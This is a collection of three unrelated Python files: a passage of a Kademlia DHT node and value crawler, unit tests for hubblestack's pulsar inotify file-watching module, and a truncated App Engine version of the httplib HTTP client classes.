Crawl the network and look for given 160-bit keys.
"""
def __init__(self, protocol, node, peers, ksize, alpha):
"""
Create a new C{SpiderCrawl}er.
Args:
protocol: A :class:`~kademlia.protocol.KademliaProtocol` instance.
node: A :class:`~kademlia.node.Node` representing the key we're looking for
peers: A list of :class:`~kademlia.node.Node` instances that provide the entry point for the network
ksize: The value for k based on the paper
alpha: The value for alpha based on the paper
"""
self.protocol = protocol
self.ksize = ksize
self.alpha = alpha
self.node = node
self.nearest = NodeHeap(self.node, self.ksize)
self.lastIDsCrawled = []
self.log = Logger(system=self)
self.log.debug("creating spider with peers: %s" % peers)
self.nearest.push(peers)
def _find(self, rpcmethod):
"""
Get either a value or list of nodes.
Args:
rpcmethod: The protocol's callFindValue or callFindNode.
The process:
1. calls find_* to current ALPHA nearest not already queried nodes,
adding results to current nearest list of k nodes.
2. current nearest list needs to keep track of who has been queried already
sort by nearest, keep KSIZE
3. if list is same as last time, next call should be to everyone not
yet queried
4. repeat, unless nearest list has all been queried, then you are done
"""
self.log.debug("crawling with nearest: %s" % str(tuple(self.nearest)))
count = self.alpha
if self.nearest.getIDs() == self.lastIDsCrawled:
self.log.debug("last iteration same as current - checking all in list now")
count = len(self.nearest)
self.lastIDsCrawled = self.nearest.getIDs()
ds = {}
for peer in self.nearest.getUncontacted()[:count]:
ds[peer.id] = rpcmethod(peer, self.node)
self.nearest.markContacted(peer)
return deferredDict(ds).addCallback(self._nodesFound)
class ValueSpiderCrawl(SpiderCrawl):
def __init__(self, protocol, node, peers, ksize, alpha, save_at_nearest=True):
SpiderCrawl.__init__(self, protocol, node, peers, ksize, alpha)
# keep track of the single nearest node without value - per
# section 2.3 so we can set the key there if found
self.nearestWithoutValue = NodeHeap(self.node, 1)
self.saveToNearestWithoutValue = save_at_nearest
def find(self):
"""
Find either the closest nodes or the value requested.
"""
return self._find(self.protocol.callFindValue)
def _nodesFound(self, responses):
"""
Handle the result of an iteration in _find.
"""
toremove = []
foundValues = []
for peerid, response in responses.items():
response = RPCFindResponse(response)
if not response.happened():
toremove.append(peerid)
elif response.hasValue():
# since we get back a list of values, we will just extend foundValues (excluding duplicates)
foundValues = list(set(foundValues) | set(response.getValue()))
else:
peer = self.nearest.getNodeById(peerid)
self.nearestWithoutValue.push(peer)
self.nearest.push(response.getNodeList())
self.nearest.remove(toremove)
if len(foundValues) > 0:
return self._handleFoundValues(foundValues)
if self.nearest.allBeenContacted():
# not found!
return None
return self.find()
def _handleFoundValues(self, values):
"""
We got some values! Exciting. But let's make sure
they're all the same or freak out a little bit. Also,
make sure we tell the nearest node that *didn't* have
the value to store it.
"""
value_dict = defaultdict(list)
ttl_dict = defaultdict(list)
for v in values:
try:
d = objects.Value()
d.ParseFromString(v)
value_dict[d.valueKey].append(d.serializedData)
ttl_dict[d.valueKey].append(d.ttl)
except Exception:
pass
value = []
for k, v in value_dict.items():
ttl = ttl_dict[k]
if len(v) > 1:
valueCounts = Counter(v)
v = [valueCounts.most_common(1)[0][0]]
ttlCounts = Counter(ttl_dict[k])
ttl = [ttlCounts.most_common(1)[0][0]]
val = objects.Value()
val.valueKey = k
val.serializedData = v[0]
val.ttl = ttl[0]
value.append(val.SerializeToString())
if self.saveToNearestWithoutValue:
ds = []
peerToSaveTo = self.nearestWithoutValue.popleft()
if peerToSaveTo is not None:
for v in value:
try:
val = objects.Value()
val.ParseFromString(v)
ds.append(self.protocol.callStore(peerToSaveTo, self.node.id, val.valueKey,
val.serializedData, val.ttl))
except Exception:
pass
return defer.gatherResults(ds).addCallback(lambda _: value)
return value
class NodeSpiderCrawl(SpiderCrawl):
def __init__(self, protocol, node, peers, ksize, alpha, find_exact=False):
SpiderCrawl.__init__(self, protocol, node, peers, ksize, alpha)
self.find_exact = find_exact
def find(self):
"""
Find the closest nodes.
"""
return self._find(self.protocol.callFindNode)
def _nodesFound(self, responses):
"""
Handle the result of an iteration in _find.
"""
toremove = []
for peerid, response in responses.items():
response = RPCFindResponse(response)
if not response.happened():
toremove.append(peerid)
else:
node_list = response.getNodeList()
self.nearest.push(node_list)
if self.find_exact:
for node in node_list:
if node.id == self.node.id:
return [node]
self.nearest.remove(toremove)
if self.nearest.allBeenContacted():
return list(self.nearest)
return self.find()
class RPCFindResponse(object):
def __init__(self, response):
"""
A wrapper for the result of a RPC find.
Args:
response: This will be a tuple of (<response received>, <value>)
where <value> will be a list of tuples if not found or
a dictionary of {'value': v} where v is the value desired
"""
self.response = response
def happened(self):
"""
Did the other host actually respond?
"""
return self.response[0]
def hasValue(self):
if len(self.response) > 0 and len(self.response[1]) > 0:
if self.response[1][0] == "value":
return True
return False
def getValue(self):
return self.response[1][1:]
def getNodeList(self):
"""
Get the node list in the response. If there's no value, this should
be set.
"""
nodes = []
for node in self.response[1]:
try:
n = objects.Node()
n.ParseFromString(node)
newNode = Node(n.guid, n.nodeAddress.ip, n.nodeAddress.port, n.publicKey,
None if not n.HasField("relayAddress") else (n.relayAddress.ip, n.relayAddress.port),
n.natType,
n.vendor)
nodes.append(newNode)
except Exception:
pass
return nodes
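# A minimal sketch of how a crawl is typically driven (not part of the original
# module): wrap the target key in a Node, seed the spider with peers that are
# already known, and let find() iterate until the k nearest nodes have all been
# queried. The `protocol` and `seed_peers` arguments, and the single-argument
# Node(...) call, are assumptions about the surrounding dht package.
def example_iterative_find(protocol, target_id, seed_peers, ksize=20, alpha=3):
    target = Node(target_id)
    spider = NodeSpiderCrawl(protocol, target, seed_peers, ksize, alpha)
    # find() returns a twisted Deferred that fires with the closest nodes found.
    return spider.find()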
|
|
import sys
import os
myPath = os.path.abspath(os.getcwd())
sys.path.insert(0, myPath)
import hubblestack.extmods.modules.pulsar as pulsar
from salt.exceptions import CommandExecutionError
import shutil
import six
import pyinotify
if os.environ.get('DEBUG_SHOW_PULSAR_LOGS'):
import logging
root_logger = logging.getLogger()
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
root_logger.addHandler(ch)
class TestPulsar():
def test_virtual(self):
var = pulsar.__virtual__()
assert var is True
def test_enqueue(self):
pulsar.__context__ = {}
var = pulsar._enqueue
assert var != 0
def test_get_notifier(self):
pulsar.__context__ = {}
var = pulsar._get_notifier
assert var != 0
def test_dict_update_for_merge_dict(self):
dest = {'key1': 'val1'}
upd = {'key_2': 'val_2'}
test_dict = {'key1': 'val1', 'key_2': 'val_2'}
var = pulsar._dict_update(dest, upd, recursive_update=True, merge_lists=False)
assert var == test_dict
def test_dict_update_for_classic_dictUpdate(self):
dest = {'key1': 'val1'}
upd = {'key_2': 'val_2'}
test_dict = {'key1': 'val1', 'key_2': 'val_2'}
var = pulsar._dict_update(dest, upd, recursive_update=False, merge_lists=False)
assert var == test_dict
def test_dict_update_for_dest_TypeError(self):
dest = 'TestValue1'
upd = {'key_1': 'val_1', 'key_2': 'val_2'}
try:
var = pulsar._dict_update(dest, upd, recursive_update=True, merge_lists=False)
except TypeError:
pass
def test_dict_update_for_upd_TypeError(self):
dest = {'key_1': 'val_1', 'key_2': 'val_2'}
upd = 'TestValue2'
try:
var = pulsar._dict_update(dest, upd, recursive_update=True, merge_lists=False)
except TypeError:
pass
def test_dict_update_recursive(self):
ret = {}
dest = {'data':
{'blacklist': {'talk1': {'data': {'Ubuntu-16.04': [{'/etc/inetd.conf': {'pattern': '^talk', 'tag': 'CIS-5.1.4'}}, {'/etc/inetd.conf': {'pattern': '^ntalk', 'tag': 'CIS-5.1.4'}}]}, 'description': 'Ensure talk server is not enabled'}},
'whitelist': {'ssh_ignore_rhosts': {'data': {'Ubuntu-16.04': [{'/etc/ssh/sshd_config': {'pattern': 'IgnoreRhosts', 'tag': 'CIS-9.3.6', 'match_output': 'yes'}}]}, 'description': 'Set SSH IgnoreRhosts to Yes'}}}}
upd = {'data':
{'blacklist': {'talk2': {'data': {'Ubuntu-16.04': [{'/etc/inetd.conf': {'pattern': '^talk', 'tag': 'CIS-5.1.4'}}, {'/etc/inetd.conf': {'pattern': '^ntalk', 'tag': 'CIS-5.1.4'}}]}, 'description': 'Ensure talk server is not enabled'}}}}
data_list = [dest, upd]
for data in data_list:
val = pulsar._dict_update(dest, data, recursive_update=True, merge_lists=True)
assert (len(val['data']['blacklist'])) == 2
def test_process(self):
configfile = 'tests/unittests/resources/hubblestack_pulsar_config.yaml'
verbose = False
def config_get(value, default):
return default
__salt__ = {}
__salt__['config.get'] = config_get
pulsar.__salt__ = __salt__
pulsar.__opts__ = {}
var = pulsar.process(configfile, verbose)
pulsar.__salt__ = {}
assert len(var) == 0
assert isinstance(var, list)
def test_top_result_for_list(self):
topfile = 'tests/unittests/resources/top.pulsar'
def cp_cache_file(value):
return 'tests/unittests/resources/top.pulsar'
def match_compound(value):
return value
__salt__ = {}
__salt__['cp.cache_file'] = cp_cache_file
__salt__['match.compound'] = match_compound
pulsar.__salt__ = __salt__
get_top_data_config = pulsar.get_top_data(topfile)
configs = ['salt://hubblestack_pulsar/' + config.replace('.', '/') + '.yaml'
for config in get_top_data_config]
assert configs[0] == 'salt://hubblestack_pulsar/hubblestack_pulsar_config.yaml'
def test_get_top_data(self):
topfile = 'tests/unittests/resources/top.pulsar'
def cp_cache_file(topfile):
return topfile
def match_compound(value):
return value
__salt__ = {}
__salt__['cp.cache_file'] = cp_cache_file
__salt__['match.compound'] = match_compound
pulsar.__salt__ = __salt__
result = pulsar.get_top_data(topfile)
pulsar.__salt__ = {}
assert isinstance(result, list)
assert result[0] == 'hubblestack_pulsar_config'
def test_get_top_data_for_CommandExecutionError(self):
topfile = '/testfile'
def cp_cache_file(topfile):
return '/testfile'
def match_compound(value):
return value
__salt__ = {}
__salt__['cp.cache_file'] = cp_cache_file
__salt__['match.compound'] = match_compound
pulsar.__salt__ = __salt__
try:
result = pulsar.get_top_data(topfile)
pulsar.__salt__ = {}
except CommandExecutionError:
pass
class TestPulsar2():
tdir = 'blah'
tfile = os.path.join(tdir, 'file')
atdir = os.path.abspath(tdir)
atfile = os.path.abspath(tfile)
def reset(self, **kw):
def config_get(value, default):
return default
if 'paths' not in kw:
kw['paths'] = []
__salt__ = {}
__salt__['config.get'] = config_get
pulsar.__salt__ = __salt__
pulsar.__opts__ = {'pulsar': kw}
pulsar.__context__ = c = {}
self.nuke_tdir()
pulsar._get_notifier() # sets up the notifier and its event queue
self.events = []
self.N = c['pulsar.notifier']
self.wm = self.N._watch_manager
self.wm.update_config()
def process(self):
self.events.extend([ "{change}(path)".format(**x) for x in pulsar.process() ])
def nuke_tdir(self):
if os.path.isdir(self.tdir):
shutil.rmtree(self.tdir)
def mk_tdir_and_write_tfile(self, fname=None, to_write='supz\n'):
if fname is None:
fname = self.tfile
if not os.path.isdir(self.tdir):
os.mkdir(self.tdir)
with open(fname, 'w') as fh:
fh.write(to_write)
def mk_subdir_files(self, *f, **kw):
if len(f) == 1 and isinstance(f[0], (list,tuple)):
f = f[0]
for _f in f:
_f = _f if _f.startswith(self.tdir + '/') else os.path.join(self.tdir, _f)
s = _f.split('/')
if s:
fn = s.pop()
b = ''
for i in s:
b = os.path.join(b,i)
if not os.path.isdir(i):
os.mkdir(b)
k = ('{}_out', 'out_{}', '{}_to_write', 'to_write')
for _k in k:
to_write = kw.get(_k.format(fn))
if to_write is not None:
break
if to_write is None:
to_write = 'supz\n'
fn = os.path.join(b, fn)
with open(fn, 'a') as fh:
fh.write(to_write if to_write is not None else 'supz\n')
def more_fname(self, number, base=None):
if base is None:
base = self.tfile
return '{0}_{1}'.format(base, number)
def mk_more_files(self, count=1, to_write='supz-{0}\n'):
for i in range(count):
with open(self.more_fname(i), 'w') as fh:
fh.write(to_write.format(count))
def test_listify_anything(self):
la = pulsar.PulsarWatchManager._listify_anything
def lla(x,e):
assert len( la(x) ) == e
def sla(x,e):
assert str(sorted(la(x))) == str(sorted(e))
lla(None, 0)
lla([None], 0)
lla(set([None]), 0)
lla(set(), 0)
lla([], 0)
lla([[],[],(),{},None,[None]], 0)
m = [[1],[2],(1,),(5),{2},None,[None],{'one':1}]
lla(m, 4)
sla(m, [1,2,5,'one'])
def test_add_watch(self, modality='add-watch'):
o = {}
kw = { self.atdir: o }
if modality in ('watch_new_files', 'watch_files'):
o[modality] = True
self.reset(**kw)
# NOTE: without new_files and/or without watch_files parent_db should
# remain empty, and we shouldn't get a watch on tfile
os.mkdir(self.tdir)
if modality == 'add-watch':
self.wm.add_watch(self.tdir, pulsar.DEFAULT_MASK)
elif modality in ('watch', 'watch_new_files', 'watch_files'):
self.wm.watch(self.tdir)
else:
raise Exception("unknown modality")
self.process()
assert len(self.events) == 0
assert self.wm.watch_db.get(self.tdir) is None
assert self.wm.watch_db.get(self.atdir) > 0
assert len(self.wm.watch_db) == 1
assert not isinstance(self.wm.parent_db.get(self.atdir), set)
self.mk_tdir_and_write_tfile() # write supz to tfile
self.process()
assert len(self.events) == 2
assert self.events[0].startswith('IN_CREATE')
assert self.events[1].startswith('IN_MODIFY')
if modality in ('watch_files', 'watch_new_files'):
assert len(self.wm.watch_db) == 2
assert isinstance(self.wm.parent_db.get(self.atdir), set)
else:
assert len(self.wm.watch_db) == 1
assert not isinstance(self.wm.parent_db.get(self.atdir), set)
self.nuke_tdir()
def test_watch(self):
self.test_add_watch(modality='watch')
def test_watch_new_files(self):
self.test_add_watch(modality='watch_new_files')
def test_recurse_without_watch_files(self):
c1 = {self.atdir: { 'recurse': False }}
c2 = {self.atdir: { 'recurse': True }}
self.reset(**c1)
self.mk_subdir_files('blah1','a/b/c/blah2')
self.wm.watch(self.tdir)
self.wm.prune()
s1 = set(self.wm.watch_db)
self.reset(**c2)
self.mk_subdir_files('blah1','a/b/c/blah2')
self.wm.watch(self.tdir)
self.wm.prune()
s2 = set(self.wm.watch_db)
s0a = set([self.atdir])
s0b = [self.atdir]
for i in 'abc':
s0b.append( os.path.join(s0b[-1], i) )
s0b = set(s0b)
assert s1 == s0a
assert s2 == s0b
def config_make_files_watch_process_reconfig(self, config, reconfig=None, mk_files=0):
'''
create a config (arg0),
make tdir and tfile,
watch the tdir,
store watch_db in s0,
make additional files (default: 0),
execute process(),
store watch_db in s1,
reconfigure using reconfig param (named param or arg1) (default: None)
execute process(),
store watch_db in s2
return s0, s1, s2 as a tuple
'''
self.reset(**config)
self.mk_tdir_and_write_tfile()
self.wm.watch(self.tdir)
s0 = set(self.wm.watch_db)
if mk_files > 0:
self.mk_more_files(count=mk_files)
self.process()
s1 = set(self.wm.watch_db)
if reconfig is None:
del self.wm.cm.nc_config[ self.atdir ]
else:
self.wm.cm.nc_config[ self.atdir ] = reconfig
self.process()
s2 = set(self.wm.watch_db)
return s0,s1,s2
def test_pruning_watch_files_false(self):
s0,s1,s2 = self.config_make_files_watch_process_reconfig({self.atdir:{}}, None, mk_files=2)
assert s0 == set([self.atdir])
assert s1 == set([self.atdir])
assert s2 == set()
def test_pruning_watch_new_files_then_false(self):
c1 = {self.atdir: { 'watch_new_files': True }}
c2 = {self.atdir: { 'watch_new_files': False }}
s0,s1,s2 = self.config_make_files_watch_process_reconfig(c1,c2, mk_files=2)
f1 = self.more_fname(0, base=self.atfile)
f2 = self.more_fname(1, base=self.atfile)
assert s0 == set([self.atdir])
assert s1 == set([self.atdir, f1, f2])
assert s2 == set([self.atdir])
def test_pruning_watch_files_then_false(self):
c1 = {self.atdir: { 'watch_files': True }}
c2 = {self.atdir: { 'watch_files': False }}
s0,s1,s2 = self.config_make_files_watch_process_reconfig(c1,c2, mk_files=2)
f1 = self.more_fname(0, base=self.atfile)
f2 = self.more_fname(1, base=self.atfile)
assert s0 == set([self.atdir, self.atfile])
assert s1 == set([self.atdir, self.atfile, f1, f2])
assert s2 == set([self.atdir])
def test_pruning_watch_new_files_then_nothing(self):
c1 = {self.atdir: { 'watch_new_files': True }}
s0,s1,s2 = self.config_make_files_watch_process_reconfig(c1,None, mk_files=2)
f1 = self.more_fname(0, base=self.atfile)
f2 = self.more_fname(1, base=self.atfile)
assert s0 == set([self.atdir])
assert s1 == set([self.atdir, f1, f2])
assert s2 == set()
def test_pruning_watch_files_then_nothing(self):
c1 = {self.atdir: { 'watch_files': True }}
s0,s1,s2 = self.config_make_files_watch_process_reconfig(c1,None, mk_files=2)
f1 = self.more_fname(0, base=self.atfile)
f2 = self.more_fname(1, base=self.atfile)
assert s0 == set([self.atdir, self.atfile])
assert s1 == set([self.atdir, f1, f2, self.atfile])
assert s2 == set()
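# A minimal sketch (not from the original suite) of the kind of mapping the
# helpers above feed into pulsar.__opts__['pulsar'] via reset(): absolute
# directory paths map to per-path options such as watch_files, watch_new_files
# and recurse, alongside the top-level 'paths' list. The literal path below is
# illustrative only.
example_pulsar_opts = {
    'paths': [],
    '/tmp/blah': {'watch_new_files': True, 'recurse': True},
}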
|
|
# Copyright 2008 Google Inc. All Rights Reserved.
# Code originally from Ian Bicking
# (http://code.google.com/p/appengine-monkey/).
# Contributed by Ian and subsequently modified here at Google.
"""Copyright 2008 Python Software Foundation, Ian Bicking, and Google."""
import cStringIO
import mimetools
HTTP_PORT = 80
HTTPS_PORT = 443
_UNKNOWN = 'UNKNOWN'
# status codes
# informational
CONTINUE = 100
SWITCHING_PROTOCOLS = 101
PROCESSING = 102
# successful
OK = 200
CREATED = 201
ACCEPTED = 202
NON_AUTHORITATIVE_INFORMATION = 203
NO_CONTENT = 204
RESET_CONTENT = 205
PARTIAL_CONTENT = 206
MULTI_STATUS = 207
IM_USED = 226
# redirection
MULTIPLE_CHOICES = 300
MOVED_PERMANENTLY = 301
FOUND = 302
SEE_OTHER = 303
NOT_MODIFIED = 304
USE_PROXY = 305
TEMPORARY_REDIRECT = 307
# client error
BAD_REQUEST = 400
UNAUTHORIZED = 401
PAYMENT_REQUIRED = 402
FORBIDDEN = 403
NOT_FOUND = 404
METHOD_NOT_ALLOWED = 405
NOT_ACCEPTABLE = 406
PROXY_AUTHENTICATION_REQUIRED = 407
REQUEST_TIMEOUT = 408
CONFLICT = 409
GONE = 410
LENGTH_REQUIRED = 411
PRECONDITION_FAILED = 412
REQUEST_ENTITY_TOO_LARGE = 413
REQUEST_URI_TOO_LONG = 414
UNSUPPORTED_MEDIA_TYPE = 415
REQUESTED_RANGE_NOT_SATISFIABLE = 416
EXPECTATION_FAILED = 417
UNPROCESSABLE_ENTITY = 422
LOCKED = 423
FAILED_DEPENDENCY = 424
UPGRADE_REQUIRED = 426
# server error
INTERNAL_SERVER_ERROR = 500
NOT_IMPLEMENTED = 501
BAD_GATEWAY = 502
SERVICE_UNAVAILABLE = 503
GATEWAY_TIMEOUT = 504
HTTP_VERSION_NOT_SUPPORTED = 505
INSUFFICIENT_STORAGE = 507
NOT_EXTENDED = 510
# Mapping status codes to official W3C names
responses = {
100: 'Continue',
101: 'Switching Protocols',
200: 'OK',
201: 'Created',
202: 'Accepted',
203: 'Non-Authoritative Information',
204: 'No Content',
205: 'Reset Content',
206: 'Partial Content',
300: 'Multiple Choices',
301: 'Moved Permanently',
302: 'Found',
303: 'See Other',
304: 'Not Modified',
305: 'Use Proxy',
306: '(Unused)',
307: 'Temporary Redirect',
400: 'Bad Request',
401: 'Unauthorized',
402: 'Payment Required',
403: 'Forbidden',
404: 'Not Found',
405: 'Method Not Allowed',
406: 'Not Acceptable',
407: 'Proxy Authentication Required',
408: 'Request Timeout',
409: 'Conflict',
410: 'Gone',
411: 'Length Required',
412: 'Precondition Failed',
413: 'Request Entity Too Large',
414: 'Request-URI Too Long',
415: 'Unsupported Media Type',
416: 'Requested Range Not Satisfiable',
417: 'Expectation Failed',
500: 'Internal Server Error',
501: 'Not Implemented',
502: 'Bad Gateway',
503: 'Service Unavailable',
504: 'Gateway Timeout',
505: 'HTTP Version Not Supported',
}
# maximal amount of data to read at one time in _safe_read
MAXAMOUNT = 1048576
# maximal line length when calling readline().
_MAXLINE = 65536
# Can't get this symbol from socket since importing socket causes an import
# cycle through:
# google.net.proto.ProtocolBuffer imports...
# httplib imports ...
# socket imports ...
# remote_socket_service_pb imports ProtocolBuffer
_GLOBAL_DEFAULT_TIMEOUT = object()
class HTTPMessage(mimetools.Message):
# App Engine Note: This class has been copied almost unchanged from
# Python 2.7.2
def addheader(self, key, value):
"""Add header for field key handling repeats."""
prev = self.dict.get(key)
if prev is None:
self.dict[key] = value
else:
combined = ", ".join((prev, value))
self.dict[key] = combined
def addcontinue(self, key, more):
"""Add more field data from a continuation line."""
prev = self.dict[key]
self.dict[key] = prev + "\n " + more
def readheaders(self):
"""Read header lines.
Read header lines up to the entirely blank line that terminates them.
The (normally blank) line that ends the headers is skipped, but not
included in the returned list. If a non-header line ends the headers,
(which is an error), an attempt is made to backspace over it; it is
never included in the returned list.
The variable self.status is set to the empty string if all went well,
otherwise it is an error message. The variable self.headers is a
completely uninterpreted list of lines contained in the header (so
printing them will reproduce the header exactly as it appears in the
file).
If multiple header fields with the same name occur, they are combined
according to the rules in RFC 2616 sec 4.2:
Appending each subsequent field-value to the first, each separated
by a comma. The order in which header fields with the same field-name
are received is significant to the interpretation of the combined
field value.
"""
# XXX The implementation overrides the readheaders() method of
# rfc822.Message. The base class design isn't amenable to
# customized behavior here so the method here is a copy of the
# base class code with a few small changes.
self.dict = {}
self.unixfrom = ''
self.headers = hlist = []
self.status = ''
headerseen = ""
firstline = 1
startofline = unread = tell = None
if hasattr(self.fp, 'unread'):
unread = self.fp.unread
elif self.seekable:
tell = self.fp.tell
while True:
if tell:
try:
startofline = tell()
except IOError:
startofline = tell = None
self.seekable = 0
line = self.fp.readline(_MAXLINE + 1)
if len(line) > _MAXLINE:
raise LineTooLong("header line")
if not line:
self.status = 'EOF in headers'
break
# Skip unix From name time lines
if firstline and line.startswith('From '):
self.unixfrom = self.unixfrom + line
continue
firstline = 0
if headerseen and line[0] in ' \t':
# XXX Not sure if continuation lines are handled properly
# for http and/or for repeating headers
# It's a continuation line.
hlist.append(line)
self.addcontinue(headerseen, line.strip())
continue
elif self.iscomment(line):
# It's a comment. Ignore it.
continue
elif self.islast(line):
# Note! No pushback here! The delimiter line gets eaten.
break
headerseen = self.isheader(line)
if headerseen:
# It's a legal header line, save it.
hlist.append(line)
self.addheader(headerseen, line[len(headerseen)+1:].strip())
continue
else:
# It's not a header line; throw it back and stop here.
if not self.dict:
self.status = 'No headers'
else:
self.status = 'Non-header line where header expected'
# Try to undo the read.
if unread:
unread(line)
elif tell:
self.fp.seek(startofline)
else:
self.status = self.status + '; bad seek'
break
class HTTPResponse:
# App Engine Note: The public interface is identical to the interface provided
# in Python 2.7 except __init__ takes a
# google.appengine.api.urlfetch.Response instance rather than a socket.
def __init__(self,
fetch_response, # App Engine Note: fetch_response was "sock".
debuglevel=0,
strict=0,
method=None,
buffering=False):
self._fetch_response = fetch_response
self.fp = cStringIO.StringIO(fetch_response.content) # For the HTTP class.
self.debuglevel = debuglevel
self.strict = strict
self._method = method
self.msg = None
# from the Status-Line of the response
self.version = _UNKNOWN # HTTP-Version
self.status = _UNKNOWN # Status-Code
self.reason = _UNKNOWN # Reason-Phrase
self.chunked = _UNKNOWN # is "chunked" being used?
self.chunk_left = _UNKNOWN # bytes left to read in current chunk
self.length = _UNKNOWN # number of bytes left in response
self.will_close = _UNKNOWN # conn will close at end of response
def begin(self):
if self.msg is not None:
# we've already started reading the response
return
self.msg = self._fetch_response.header_msg
self.version = 11 # We can't get the real HTTP version so make one up.
self.status = self._fetch_response.status_code
self.reason = responses.get(self._fetch_response.status_code, 'Unknown')
# The following are implementation details and should not be read by
# clients - but set them to reasonable values just in case.
self.chunked = 0
self.chunk_left = None
self.length = None
self.will_close = 1
def close(self):
if self.fp:
self.fp.close()
self.fp = None
def isclosed(self):
return self.fp is None
def read(self, amt=None):
if self.fp is None:
return ''
if self._method == 'HEAD':
self.close()
return ''
if amt is None:
return self.fp.read()
else:
return self.fp.read(amt)
def fileno(self):
raise NotImplementedError('fileno is not supported')
def getheader(self, name, default=None):
if self.msg is None:
raise ResponseNotReady()
return self.msg.getheader(name, default)
def getheaders(self):
"""Return list of (header, value) tuples."""
if self.msg is None:
raise ResponseNotReady()
return self.msg.items()
class HTTPConnection:
# App Engine Note: The public interface is identical to the interface provided
# in Python 2.7.2 but the implementation uses
# google.appengine.api.urlfetch. Some methods are no-ops and set_tunnel
# raises NotImplementedError.
_protocol = 'http' # passed to urlfetch.
_http_vsn = 11
_http_vsn_str = 'HTTP/1.1'
response_class = HTTPResponse
default_port = HTTP_PORT
auto_open = 1
debuglevel = 0
strict = 0
_allow_truncated = True
_follow_redirects = False
def __init__(self, host, port=None, strict=None,
timeout=_GLOBAL_DEFAULT_TIMEOUT, source_address=None):
# net.proto.ProtocolBuffer relies on httplib so importing urlfetch at the
# module level causes a failure on prod. That means the import needs to be
# lazy.
from google.appengine.api import urlfetch
self._fetch = urlfetch.fetch
self._method_map = {
'GET': urlfetch.GET,
'POST': urlfetch.POST,
'HEAD': urlfetch.HEAD,
'PUT': urlfetch.PUT,
'DELETE': urlfetch.DELETE,
'PATCH': urlfetch.PATCH,
}
self.host = host
self.port = port
# With urllib2 in Python 2.6, an object can be passed here.
# The default is set to socket.GLOBAL_DEFAULT_TIMEOUT which is an object.
# We only accept float, int or long values, otherwise it can be
# silently ignored.
if not isinstance(timeout, (float, int, long)):
timeout = None
self.timeout = timeout
# Both 'strict' and 'source_address' are ignored.
self._method = self._url = None
self._body = ''
self.headers = []
def set_tunnel(self, host, port=None, headers=None):
""" Sets up the host and the port for the HTTP CONNECT Tunnelling.
The headers argument should be a mapping of extra HTTP headers
to send with the CONNECT request.
App Engine Note: This method is not supported.
"""
raise NotImplementedError('HTTP CONNECT Tunnelling is not supported')
def set_debuglevel(self, level):
pass
def connect(self):
"""Connect to the host and port specified in __init__.
App Engine Note: This method is a no-op.
"""
def close(self):
"""Close the connection to the HTTP server.
App Engine Note: This method is a no-op.
"""
def send(self, data):
"""Send `data' to the server."""
self._body += data
def putrequest(self, method, url, skip_host=0, skip_accept_encoding=0):
"""Send a request to the server.
`method' specifies an HTTP request method, e.g. 'GET'.
`url' specifies the object being requested, e.g. '/index.html'.
`skip_host' if True does not add automatically a 'Host:' header
`skip_accept_encoding' if True does not add automatically an
'Accept-Encoding:' header
App Engine Note: `skip_host' and `skip_accept_encoding' are not honored by
the urlfetch service.
"""
self._method = method
self._url = url
def putheader(self, header, *values):
"""Send a request header line to the server.
For example: h.putheader('Accept', 'text/html')
"""
hdr = '\r\n\t'.join([str(v) for v in values])
self.headers.append((header, hdr))
def endheaders(self, message_body=None):
"""Indicate that the last header line has been sent to the server.
This method sends the request to the server. The optional
message_body argument can be used to pass message body
associated with the request. The message body will be sent in
the same packet as the message headers if possible. The
message_body should be a string.
"""
if message_body is not None:
self.send(message_body)
def request(self, method, url, body=None, headers=None):
"""Send a complete request to the server."""
self._method = method
self._url = url
try: # 'body' can be a file.
self._body = body.read()
except AttributeError:
self._body = body
if headers is None:
headers = []
elif hasattr(headers, 'items'):
headers = headers.items()
self.headers = headers
def getresponse(self, buffering=False):
"""Get the response from the server.
App Engine Note: buffering is ignored.
"""
# net.proto.ProtocolBuffer relies on httplib so importing urlfetch at the
# module level causes a failure on prod. That means the import needs to be
# lazy.
from google.appengine.api import urlfetch
import socket # Cannot be done at global scope due to circular import.
if self.port and self.port != self.default_port:
host = '%s:%s' % (self.host, self.port)
else:
host = self.host
if not self._url.startswith(self._protocol):
url = '%s://%s%s' % (self._protocol, host, self._url)
else:
url = self._url
headers = dict(self.headers)
if self.timeout in [_GLOBAL_DEFAULT_TIMEOUT,
socket._GLOBAL_DEFAULT_TIMEOUT]:
deadline = socket.getdefaulttimeout()
else:
deadline = self.timeout
try:
method = self._method_map[self._method.upper()]
except KeyError:
raise ValueError('%r is an unrecognized HTTP method' % self._method)
try:
fetch_response = self._fetch(url,
self._body,
method, headers,
self._allow_truncated,
self._follow_redirects,
deadline)
except urlfetch.InvalidURLError, e:
raise InvalidURL(str(e))
except (urlfetch.ResponseTooLargeError, urlfetch.DeadlineExceededError), e:
raise HTTPException(str(e))
except urlfetch.SSLCertificateError, e:
# Should be ssl.SSLError but the ssl module isn't available.
raise HTTPException(str(e))
except urlfetch.DownloadError, e:
# One of the following occurred: UNSPECIFIED_ERROR, FETCH_ERROR
raise socket.error(
'An error occurred while connecting to the server: %s' % e)
response = self.response_class(fetch_response, method=method)
response.begin()
self.close()
return response
class HTTPSConnection(HTTPConnection):
"This class allows communication via SSL."
# App Engine Note: The public interface is identical to the interface provided
# in Python 2.7.2 but the implementation does not support key and
# certificate files.
_protocol = 'https' # passed to urlfetch.
default_port = HTTPS_PORT
def __init__(self, host, port=None, key_file=None, cert_file=None,
strict=False, timeout=_GLOBAL_DEFAULT_TIMEOUT,
source_address=None):
if key_file is not None or cert_file is not None:
raise NotImplementedError(
'key_file and cert_file arguments are not implemented')
HTTPConnection.__init__(self, host, port, strict, timeout, source_address)
class HTTP:
"Compatibility class with httplib.py from 1.5."
# App Engine Note: The public interface is identical to the interface provided
# in Python 2.7.
_http_vsn = 10
_http_vsn_str = 'HTTP/1.0'
debuglevel = 0
_connection_class = HTTPConnection
def __init__(self, host='', port=None, strict=None):
"Provide a default host, since the superclass requires one."
# some joker passed 0 explicitly, meaning default port
if port == 0:
port = None
# Note that we may pass an empty string as the host; this will throw
# an error when we attempt to connect. Presumably, the client code
# will call connect before then, with a proper host.
self._setup(self._connection_class(host, port, strict))
def _setup(self, conn):
self._conn = conn
# set up delegation to flesh out interface
self.send = conn.send
self.putrequest = conn.putrequest
self.endheaders = conn.endheaders
self.set_debuglevel = conn.set_debuglevel
conn._http_vsn = self._http_vsn
conn._http_vsn_str = self._http_vsn_str
self.file = None
def connect(self, host=None, port=None):
"Accept arguments to set the host/port, since the superclass doesn't."
self.__init__(host, port)
def getfile(self):
